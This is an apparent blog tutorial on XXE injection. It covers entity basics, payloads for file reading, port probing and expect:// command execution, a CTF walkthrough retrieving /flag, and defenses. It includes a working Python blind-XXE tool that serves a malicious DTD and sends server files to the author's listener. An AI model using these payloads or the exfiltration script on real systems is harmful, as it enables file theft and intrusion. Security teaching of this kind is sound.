XML external entity injection vulnerability

Posted by swasheck on Sun, 06 Feb 2022 07:54:16 +0100

XML external entity injection vulnerability (XXE)

XML introduction

  • XML is not a substitute for HTML.

  • XML and HTML are designed for different purposes:

  • XML is designed to transmit and store data, and its focus is the content of the data.

  • HTML is designed to display data, focusing on the appearance of the data.

  • HTML is designed to display information, while XML is designed to transmit information.

An XML document consists of an XML declaration, a DTD (document type definition), and the document elements.

libxml is an XML parser. Since libxml2 2.9.0, external entities are no longer parsed by default, so XXE vulnerabilities are gradually becoming less common.

<?xml version="1.0"?>   <!-- XML declaration -->

<!DOCTYPE note SYSTEM "note.dtd">   <!-- DTD document type definition -->

<note>                                <!-- Document element -->
<from>John</from>
<body>Don't forget the meeting!</body>
</note>

Internal declaration DTD

<!DOCTYPE root-element [element-declarations]>

Entities can be thought of as variables. They can be declared internally or externally: an internal declaration is like defining a variable directly, while an external declaration is like importing the contents of an external file as the variable's value.

Internal declaration entity

  • <!ENTITY entity-name "entity value">
  • Examples

    <?xml version="1.0"?>
    <!DOCTYPE note [
    <!ENTITY writer "Bill Gates">
    <!ENTITY copyright "Copyright W3School.com.cn">
    ]>
    <author>&writer;&copyright;</author>
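
To see the "entity as a variable" idea in action, here is a minimal sketch that parses a document using the two internal entities above with Python's standard xml.etree.ElementTree module. The <note> root element, the " / " separator, and the variable names are assumptions added for illustration.

```python
import xml.etree.ElementTree as ET

# Internal entities behave like variables declared inside the DTD.
# The <note> root element is an assumption added to make the document complete.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
]>
<note>&writer; / &copyright;</note>"""

root = ET.fromstring(DOCUMENT)
# The parser substitutes each entity reference with its declared value.
expanded = root.text
print(expanded)
```

The parser replaces &writer; and &copyright; before the application ever sees the text, which is exactly why an entity that points at an external resource is dangerous.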

External declaration entity

  • <!ENTITY entity-name SYSTEM "URI/URL">
  • The URI can use http, https, file, and other protocols, depending on the parser and platform

  • Examples

    <?xml version="1.0"?>
    <!DOCTYPE note [
    <!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
    <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
    ]>
    <author>&writer;&copyright;</author>

External declaration DTD

  • An externally declared DTD is a DTD file imported directly from outside the document. Do not confuse it with an externally declared entity.

  • <!DOCTYPE root-element SYSTEM "file-name">
  • Examples

    <?xml version="1.0"?>
    <!DOCTYPE note SYSTEM "note.dtd">
    <note>
    <body>Don't forget the meeting!</body>
    </note>

Vulnerability impact

  1. Read arbitrary files from the server (using the file protocol)

    <!ENTITY writer SYSTEM "file:///flag">

  2. Probe intranet ports

    <?xml version="1.0"?>
    <!DOCTYPE user [
    <!ENTITY writer SYSTEM "http://ip:port/xxx">
    ]>

    In PHP, the error message returned by simplexml_load_string, or the response time, can indicate whether the port is open (provided the target system does not suppress it).

  3. Execute system commands (only under certain conditions; the method differs between languages)

    In a PHP environment with the expect extension installed, system commands can be executed directly.
    The following runs the ifconfig command:
    <?xml version="1.0"?>
    <!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY XXE SYSTEM "expect://ifconfig" >]>
  4. Attack intranet websites (requires a vulnerability in the intranet website itself)
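
The file-read and port-probe payloads in items 1 and 2 have the same shape and differ only in the URI the entity points at. A minimal sketch of a helper that generates them follows; the function name build_xxe_payload, the address 127.0.0.1, and the port list are hypothetical placeholders, not values from a real target.

```python
def build_xxe_payload(system_uri, root="user", entity="writer"):
    """Return an XML document whose external entity points at system_uri."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'<!ENTITY {entity} SYSTEM "{system_uri}">\n'
        "]>\n"
        f"<{root}>&{entity};</{root}>"
    )


# Item 1: read a local file through the file protocol.
file_read = build_xxe_payload("file:///flag")

# Item 2: one probe document per candidate port.
# 127.0.0.1 and the ports below are placeholders for illustration only.
port_probes = {
    port: build_xxe_payload(f"http://127.0.0.1:{port}/")
    for port in (22, 80, 3306)
}

print(file_read)
```

Sending each probe and comparing error messages or response times is then up to the HTTP client being used.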

BUUCTF CTF challenge

[NCTF2019]Fake XML cookbook

Try to log in and capture the request with Burp Suite

Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
In addition, the POST body is in XML format, so an XML external entity injection vulnerability may be present.
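
The check described here can be written as a rough heuristic: the request advertises XML in its headers and its body parses as XML. This is only a sketch; the function name, the plain-dict header format, and the sample body are assumptions, and a positive result means "worth testing", not "vulnerable".

```python
import xml.etree.ElementTree as ET


def looks_like_xml_endpoint(headers, body):
    """Heuristic: does a captured request suggest the server parses XML?

    headers is assumed to be a plain dict using canonical header names.
    """
    accept = headers.get("Accept", "").lower()
    content_type = headers.get("Content-Type", "").lower()
    advertises_xml = "xml" in accept or "xml" in content_type
    try:
        ET.fromstring(body)
        body_is_xml = True
    except ET.ParseError:
        body_is_xml = False
    return advertises_xml and body_is_xml


captured_headers = {
    "Accept": "application/xml, text/xml, */*; q=0.01",
    "X-Requested-With": "XMLHttpRequest",
}
# Hypothetical login body, used only to exercise the function.
sample_body = "<user><username>admin</username><password>123</password></user>"
print(looks_like_xml_endpoint(captured_headers, sample_body))
```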

Test injection

<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY writer "test">
]>
<user><username>&writer;</username><password>test</password></user>

The test injection succeeds, which confirms the vulnerability. Because this is a CTF challenge, the goal is the flag, so the next step is to read the local flag file.

The file path read here is /flag (many CTF challenges put the flag there).
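
The final request can be put together as in the sketch below, which swaps the test entity for one that points at file:///flag. The endpoint URL is a hypothetical placeholder, and the username and password element names are assumed from the login form. The request is only built here; call send() yourself against a target you are authorized to test.

```python
import urllib.request

# Hypothetical endpoint; replace with the challenge's real login URL.
TARGET_URL = "http://target.example/doLogin.php"

# The element names are assumptions about the login form's XML body.
PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY writer SYSTEM "file:///flag">
]>
<user><username>&writer;</username><password>test</password></user>"""


def build_request(url=TARGET_URL, payload=PAYLOAD):
    """Build (but do not send) the POST request carrying the XXE payload."""
    return urllib.request.Request(
        url,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


def send(request):
    """Send the request and return the response body as text."""
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.read().decode("utf-8", errors="replace")


request = build_request()
print(request.get_method(), request.full_url)
```

If the server echoes the username back in its response, the contents of /flag appear where the username would normally be.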

Detecting XXE with Python

XXE with echo (as in the CTF challenge above) is easy to confirm, but XXE without echo (blind XXE) is more cumbersome to detect. The following Python script helps detect it: it serves a malicious DTD over HTTP and logs the requests that the target sends back.

from http.server import HTTPServer, SimpleHTTPRequestHandler
import threading
import requests
import sys

# Override the built-in log_message so each request is saved to a file as well as printed
class MyHandler(SimpleHTTPRequestHandler):
    def log_message(self, format, *args):
        line = "%s - - [%s] %s\n" % (
            self.address_string(),
            self.log_date_time_string(),
            format % args,
        )
        # Print the HTTP access information to the terminal
        sys.stderr.write(line)
        # Append the same information to a file
        with open("result.txt", "a") as textFile:
            textFile.write(line)

# Start the HTTP service and receive data
def StartHTTP(lip, lport):
    # IP address and port the HTTP server listens on
    serverAddr = (lip, lport)
    httpd = HTTPServer(serverAddr, MyHandler)
    print("[*] Starting HTTP server:\n\n================\nIP address:{0}\nport:{1}\n================\n".format(lip, lport))
    # Serve requests until the process is stopped
    httpd.serve_forever()

# Create the attack payload file (the external DTD served to the target)
def ExportPayload(lip, lport):
    with open('evil.xml', 'w') as file:
        file.write("<!ENTITY % payload \"<!ENTITY &#x25; send SYSTEM 'http://{0}:{1}/?content=%file;'>\"> %payload;".format(lip, lport))
    print("[*] Payload file created successfully!")

# Send the attack data via POST
def SendData(lip, lport, url):
    # Path of the file to read (default)
    filePath = "c:\\test.txt"
    while True:
        # Normalize backslashes in the path to forward slashes
        filePath = filePath.replace('\\', "/")
        data = "<?xml version=\"1.0\"?>\n<!DOCTYPE test[\n<!ENTITY % file SYSTEM \"php://filter/read=convert.base64-encode/resource={0}\">\n<!ENTITY % dtd SYSTEM \"http://{1}:{2}/evil.xml\">\n%dtd;\n%send;\n]>".format(filePath, lip, lport)
        requests.post(url, data=data)
        # Continue to receive user input and read the specified file
        filePath = input("Input filePath:")

if __name__ == '__main__':
    # Local IP address (must be reachable from the target)
    lip = ""
    # Local HTTP listening port
    lport = 3344
    # URL that the target site's form submits to
    url = ""
    # Create the payload file
    ExportPayload(lip, lport)
    # HTTP service thread
    threadHTTP = threading.Thread(target=StartHTTP, args=(lip, lport))
    threadHTTP.start()
    # POST-sending thread
    threadPOST = threading.Thread(target=SendData, args=(lip, lport, url))
    threadPOST.start()
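
Because the payload wraps the file in php://filter/read=convert.base64-encode, whatever arrives in the content parameter of the logged request is base64 text. A minimal sketch of a decoder for one line of result.txt follows; the function name and the sample log line are made up for illustration, and the line format assumes the default http.server access-log layout.

```python
import base64
import re
from urllib.parse import unquote


def decode_exfiltrated(log_line):
    """Return the decoded file content from one access-log line, or None."""
    match = re.search(r'[?&]content=([^\s"&]+)', log_line)
    if match is None:
        return None
    # Undo any percent-encoding applied to the query string.
    encoded = unquote(match.group(1))
    # Restore base64 padding in case it was dropped in transit.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# Made-up log line in the shape http.server writes.
sample = (
    '10.0.0.5 - - [06/Feb/2022 07:54:16] "GET /?content='
    + base64.b64encode(b"flag{test}").decode("ascii")
    + ' HTTP/1.1" 200 -'
)
print(decode_exfiltrated(sample))
```

Running this over every line of result.txt turns the raw access log into the contents of the files that were requested.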

For a practice target, you can use xxe-lab.
In xxe-lab's doLogin.php, make the following changes:

  • Comment out echo $result; on the last line
  • Add error_reporting(0);

With these changes the page produces no output and reports no errors, which turns it into an echo-free (blind) XXE vulnerability.

Defense strategy

  1. Disable resolution of external entities by default
  2. Filter XML data submitted by users for keywords such as <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.
  3. Disable the relevant entity-loading functions in the programming language the website is written in
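
Strategies 1 and 2 can be sketched in Python with the standard library alone. The example below uses xml.sax with the external-entity features explicitly switched off, plus a simple keyword filter. The function and class names are made up for illustration, and the filter is deliberately blunt: it also rejects harmless documents that happen to contain the words SYSTEM or PUBLIC.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Strategy 2: keywords that should not appear in user-submitted XML.
SUSPICIOUS = re.compile(r"<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b")


def contains_dtd_keywords(xml_text):
    """Return True if the text contains DTD or external-entity keywords."""
    return SUSPICIOUS.search(xml_text) is not None


class TextCollector(ContentHandler):
    """Collect all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(xml_bytes):
    """Strategy 1: parse with external entity loading explicitly disabled."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # general entities
    parser.setFeature(feature_external_pes, False)  # parameter entities
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


print(contains_dtd_keywords('<!DOCTYPE user [<!ENTITY writer SYSTEM "file:///flag">]>'))
```

In practice the two are usually layered: reject input that trips the filter, and still parse whatever passes with external entities disabled.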